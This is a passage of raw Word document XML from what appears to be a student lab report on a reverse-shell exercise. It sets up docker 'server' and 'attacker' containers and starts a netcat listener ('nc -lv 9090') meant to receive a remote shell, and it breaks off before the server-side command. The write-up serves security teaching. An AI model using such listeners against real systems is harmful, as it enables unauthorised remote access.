          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00BD3EBF" w:rsidRPr="0041004D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DD84EC" w14:textId="3AD5A1B9" w:rsidR="002B67EA" w:rsidRPr="00F413ED" w:rsidRDefault="002B67EA" w:rsidP="002B67EA">
      <w:pPr>
        <w:spacing w:after="0" w:line="48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41004D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="0041004D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48411ED6" w14:textId="6F7A671E" w:rsidR="002B67EA" w:rsidRDefault="002B67EA" w:rsidP="002B67EA">
      <w:pPr>
        <w:spacing w:after="0" w:line="480" w:lineRule="auto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Unzipped Labsetup.zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0548E511" w14:textId="0EE6D96F" w:rsidR="002B67EA" w:rsidRDefault="006126DE" w:rsidP="002B67EA">
      <w:pPr>
        <w:spacing w:after="0" w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center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w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42B4CA03" wp14:editId="2B58F61F">
            <wp:extent cx="5943600" cy="3860800"/>
            <wp:effectExtent l="0" t="0" r="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6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DB7328" w14:textId="31C49D24" w:rsidR="002B67EA" w:rsidRDefault="00C06F87" w:rsidP="00BE5FFD">
      <w:pPr>
        <w:spacing w:after="0" w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="24292F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After I extracted the file, the following commands are used to create docker Server with IP 10.9.0.5 and Attacker with IP 10.9.0.1: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C06F87">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="24292F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="24292F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">-compose build </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidRPr="00C06F87">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="24292F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="24292F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-compose up</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="24292F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. These are shown </w:t>
      </w:r>
      <w:r w:rsidRPr="0041004D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="24292F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>in Figure xx.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ECD3914" w14:textId="0213ADA7" w:rsidR="00C06F87" w:rsidRDefault="00C06F87">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="24292F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="24292F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0A330B" w14:textId="5D8D6246" w:rsidR="00C06F87" w:rsidRPr="00F413ED" w:rsidRDefault="00C06F87" w:rsidP="00C06F87">
      <w:pPr>
        <w:spacing w:after="0" w:line="48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41004D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Figure </w:t>
      </w:r>
      <w:r w:rsidR="0041004D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7855167E" w14:textId="5FEFDA35" w:rsidR="00C06F87" w:rsidRDefault="00C06F87" w:rsidP="00C06F87">
      <w:pPr>
        <w:spacing w:after="0" w:line="480" w:lineRule="auto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Create docker server and attacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734CD662" w14:textId="60B02B96" w:rsidR="00C06F87" w:rsidRDefault="00C06F87" w:rsidP="00C06F87">
      <w:pPr>
        <w:spacing w:after="0" w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center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w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02C0E5CD" wp14:editId="4F0387E2">
            <wp:extent cx="5943600" cy="23622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8816"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2362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CFF07C" w14:textId="0ABB8AA5" w:rsidR="008F08F3" w:rsidRPr="00364E35" w:rsidRDefault="00C06F87" w:rsidP="00BE5FFD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 w:rsidR="00364E35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Now, we can use </w:t>
      </w:r>
      <w:r w:rsidR="00364E35" w:rsidRPr="00C06F87">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="24292F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dock</w:t>
      </w:r>
      <w:r w:rsidR="00364E35">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="24292F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ps</w:t>
      </w:r>
      <w:r w:rsidR="00364E35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="24292F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to find container IDs and </w:t>
      </w:r>
      <w:r w:rsidR="00364E35" w:rsidRPr="00C06F87">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="24292F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dock</w:t>
      </w:r>
      <w:r w:rsidR="00364E35">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="24292F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:r w:rsidR="00364E35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="24292F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> following with the ID to gain access to server and attacker as </w:t>
      </w:r>
      <w:r w:rsidR="00364E35" w:rsidRPr="0041004D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="24292F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">shown in Figure </w:t>
      </w:r>
      <w:r w:rsidR="0041004D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="24292F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00364E35" w:rsidRPr="0041004D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="24292F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="0041004D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="24292F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidR="00364E35" w:rsidRPr="0041004D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="24292F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD587C6" w14:textId="038B49DA" w:rsidR="00364E35" w:rsidRPr="00F413ED" w:rsidRDefault="00364E35" w:rsidP="00364E35">
      <w:pPr>
        <w:spacing w:after="0" w:line="48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41004D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="0041004D" w:rsidRPr="0041004D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC67EA3" w14:textId="4DBA335C" w:rsidR="00364E35" w:rsidRDefault="00364E35" w:rsidP="00364E35">
      <w:pPr>
        <w:spacing w:after="0" w:line="480" w:lineRule="auto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dockps command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F50689" w14:textId="1B3DE67E" w:rsidR="00364E35" w:rsidRDefault="00364E35" w:rsidP="00364E35">
      <w:pPr>
        <w:spacing w:after="0" w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center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w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A45EA11" wp14:editId="2003EB53">
            <wp:extent cx="5933569" cy="18288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2876"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5935345" cy="1829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A3854F" w14:textId="45501F32" w:rsidR="00364E35" w:rsidRDefault="00364E35" w:rsidP="00364E35">
      <w:pP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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DF8301" w14:textId="3FA46CB6" w:rsidR="00364E35" w:rsidRPr="00F413ED" w:rsidRDefault="00364E35" w:rsidP="00364E35">
      <w:pPr>
        <w:spacing w:after="0" w:line="48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41004D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="0041004D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B1A8F5" w14:textId="6EDFC84C" w:rsidR="00364E35" w:rsidRDefault="00364E35" w:rsidP="00364E35">
      <w:pPr>
        <w:spacing w:after="0" w:line="480" w:lineRule="auto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docksh command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AABB8E9" w14:textId="5B994912" w:rsidR="00364E35" w:rsidRDefault="006816AA" w:rsidP="00364E35">
      <w:pPr>
        <w:spacing w:after="0" w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center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22951367" wp14:editId="5B5F2CEA">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2119630</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3962188" cy="440055"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="3" name="Text Box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188" cy="44005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</a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="69559DB0" w14:textId="6FFC682E" w:rsidR="006816AA" w:rsidRPr="006816AA" w:rsidRDefault="006816AA" w:rsidP="006816A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32"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="006816AA">
                              <w:rPr>
                                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                                <w:sz w:val="24"/>
                                <w:szCs w:val="32"/>
                              </w:rPr>
                              <w:t xml:space="preserve">Note: In this case, </w:t>
                            </w:r>
                            <w:r w:rsidRPr="006816AA">
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                <w:color w:val="24292F"/>
                                <w:sz w:val="20"/>
                                <w:szCs w:val="20"/>
                              </w:rPr>
                              <w:t xml:space="preserve">docksh </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                <w:color w:val="24292F"/>
                                <w:sz w:val="20"/>
                                <w:szCs w:val="20"/>
                              </w:rPr>
                              <w:t>5</w:t>
                            </w:r>
                            <w:r w:rsidRPr="006816AA">
                              <w:rPr>
                                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                                <w:sz w:val="24"/>
                                <w:szCs w:val="32"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> will also wor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2951367" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
                <v:stroke joinstyle="miter"/>
                <v:path gradientshapeok="t" o:connecttype="rect"/>
              </v:shapetype>
              <v:shape id="Text Box 3" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:166.9pt;width:312pt;height:34.65pt;z-index:25169817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" filled="f" stroked="f" strokeweight="3pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="69559DB0" w14:textId="6FFC682E" w:rsidR="006816AA" w:rsidRPr="006816AA" w:rsidRDefault="006816AA" w:rsidP="006816AA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32"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="006816AA">
                        <w:rPr>
                          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="32"/>
                        </w:rPr>
                        <w:t xml:space="preserve">Note: In this case, </w:t>
                      </w:r>
                      <w:r w:rsidRPr="006816AA">
                        <w:rPr>
                          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                          <w:color w:val="24292F"/>
                          <w:sz w:val="20"/>
                          <w:szCs w:val="20"/>
                        </w:rPr>
                        <w:t xml:space="preserve">docksh </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                          <w:color w:val="24292F"/>
                          <w:sz w:val="20"/>
                          <w:szCs w:val="20"/>
                        </w:rPr>
                        <w:t>5</w:t>
                      </w:r>
                      <w:r w:rsidRPr="006816AA">
                        <w:rPr>
                          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="32"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> will also work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07E887D2" wp14:editId="3AFA5CB9">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>994199</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3962188" cy="44005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62188" cy="44005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</a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="7C8ED41F" w14:textId="34A085A4" w:rsidR="006816AA" w:rsidRPr="006816AA" w:rsidRDefault="006816AA" w:rsidP="006816A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32"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="006816AA">
                              <w:rPr>
                                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                                <w:sz w:val="24"/>
                                <w:szCs w:val="32"/>
                              </w:rPr>
                              <w:t xml:space="preserve">Note: In this case, </w:t>
                            </w:r>
                            <w:r w:rsidRPr="006816AA">
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                <w:color w:val="24292F"/>
                                <w:sz w:val="20"/>
                                <w:szCs w:val="20"/>
                              </w:rPr>
                              <w:t>docksh d</w:t>
                            </w:r>
                            <w:r w:rsidRPr="006816AA">
                              <w:rPr>
                                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                                <w:sz w:val="24"/>
                                <w:szCs w:val="32"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> will also wor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E887D2" id="Text Box 1" o:spid="_x0000_s1027" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:78.3pt;width:312pt;height:34.65pt;z-index:25169612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" filled="f" stroked="f" strokeweight="3pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7C8ED41F" w14:textId="34A085A4" w:rsidR="006816AA" w:rsidRPr="006816AA" w:rsidRDefault="006816AA" w:rsidP="006816AA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32"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="006816AA">
                        <w:rPr>
                          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="32"/>
                        </w:rPr>
                        <w:t xml:space="preserve">Note: In this case, </w:t>
                      </w:r>
                      <w:r w:rsidRPr="006816AA">
                        <w:rPr>
                          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                          <w:color w:val="24292F"/>
                          <w:sz w:val="20"/>
                          <w:szCs w:val="20"/>
                        </w:rPr>
                        <w:t>docksh d</w:t>
                      </w:r>
                      <w:r w:rsidRPr="006816AA">
                        <w:rPr>
                          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="32"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> will also work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A93188">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman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D7E2440" wp14:editId="6902334A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4376632</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2067560</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="990177" cy="440055"/>
                <wp:effectExtent l="19050" t="19050" r="19685" b="17145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90177" cy="4400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3810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11824506" w14:textId="11761E7F" w:rsidR="00A93188" w:rsidRPr="002F0796" w:rsidRDefault="00A93188" w:rsidP="002F079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32"/>
                                <w:szCs w:val="40"/>
                              </w:rPr>
                              <w:t>Attack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7E2440" id="Text Box 15" o:spid="_x0000_s1028" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:344.6pt;margin-top:162.8pt;width:77.95pt;height:34.6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" fillcolor="white [3201]" strokecolor="red" strokeweight="3pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="11824506" w14:textId="11761E7F" w:rsidR="00A93188" w:rsidRPr="002F0796" w:rsidRDefault="00A93188" w:rsidP="002F0796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4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32"/>
                          <w:szCs w:val="40"/>
                        </w:rPr>
                        <w:t>Attacker</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="002F0796">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman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166FD8D" wp14:editId="34A064AF">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4334933</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>746760</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="990177" cy="440055"/>
                <wp:effectExtent l="19050" t="19050" r="19685" b="17145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90177" cy="4400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3810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669DC82B" w14:textId="433C787E" w:rsidR="002F0796" w:rsidRPr="002F0796" w:rsidRDefault="002F0796" w:rsidP="002F0796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40"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="002F0796">
                              <w:rPr>
                                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                                <w:sz w:val="32"/>
                                <w:szCs w:val="40"/>
                              </w:rPr>
                              <w:t>Serv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66FD8D" id="Text Box 13" o:spid="_x0000_s1029" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:341.35pt;margin-top:58.8pt;width:77.95pt;height:34.6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" fillcolor="white [3201]" strokecolor="red" strokeweight="3pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="669DC82B" w14:textId="433C787E" w:rsidR="002F0796" w:rsidRPr="002F0796" w:rsidRDefault="002F0796" w:rsidP="002F0796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40"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="002F0796">
                        <w:rPr>
                          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                          <w:sz w:val="32"/>
                          <w:szCs w:val="40"/>
                        </w:rPr>
                        <w:t>Server</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="002F0796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w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66A8F37A" wp14:editId="1A25BEBD">
            <wp:extent cx="5935345" cy="1049867"/>
            <wp:effectExtent l="0" t="0" r="825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8694"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5935345" cy="10498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2F0796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w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77F58D33" wp14:editId="19005484">
            <wp:extent cx="5935345" cy="1168400"/>
            <wp:effectExtent l="0" t="0" r="825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6289"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5935345" cy="116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9B3B19A" w14:textId="1BBD2E44" w:rsidR="003C319B" w:rsidRPr="006967A3" w:rsidRDefault="003C319B" w:rsidP="003C319B">
      <w:pPr>
        <w:spacing w:after="0" w:line="480" w:lineRule="auto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  <w:t>At this point, we finished setting up the server and attacker. So, we may begin the reverse shell.</w:t>
      </w:r>
      <w:r w:rsidR="00EC02A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6967A3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The operation starts by giving attacker a command </w:t>
      </w:r>
      <w:r w:rsidR="006967A3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="24292F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nc -lv 9090</w:t>
      </w:r>
      <w:r w:rsidR="006967A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="24292F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (listen to server via port </w:t>
      </w:r>
      <w:r w:rsidR="006967A3" w:rsidRPr="00516B60">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="24292F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">9090) as shown in Figure </w:t>
      </w:r>
      <w:r w:rsidR="00516B60" w:rsidRPr="00516B60">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="24292F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidR="006967A3" w:rsidRPr="00516B60">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="24292F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060F05A1" w14:textId="34334A0A" w:rsidR="005A0EE3" w:rsidRPr="00F413ED" w:rsidRDefault="005A0EE3" w:rsidP="005A0EE3">
      <w:pPr>
        <w:spacing w:after="0" w:line="48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516B60">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00516B60">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0957B108" w14:textId="190D83B1" w:rsidR="005A0EE3" w:rsidRDefault="005A0EE3" w:rsidP="005A0EE3">
      <w:pPr>
        <w:spacing w:after="0" w:line="480" w:lineRule="auto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Attacker initial command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042F3496" w14:textId="0085A3D6" w:rsidR="005A0EE3" w:rsidRDefault="005A0EE3" w:rsidP="005A0EE3">
      <w:pPr>
        <w:spacing w:after="0" w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center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2010635" wp14:editId="26989714">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4334087</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>848360</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="990177" cy="440055"/>
                <wp:effectExtent l="19050" t="19050" r="19685" b="17145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90177" cy="4400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3810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79AF5D88" w14:textId="77777777" w:rsidR="005A0EE3" w:rsidRPr="002F0796" w:rsidRDefault="005A0EE3" w:rsidP="005A0EE3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32"/>
                                <w:szCs w:val="40"/>
                              </w:rPr>
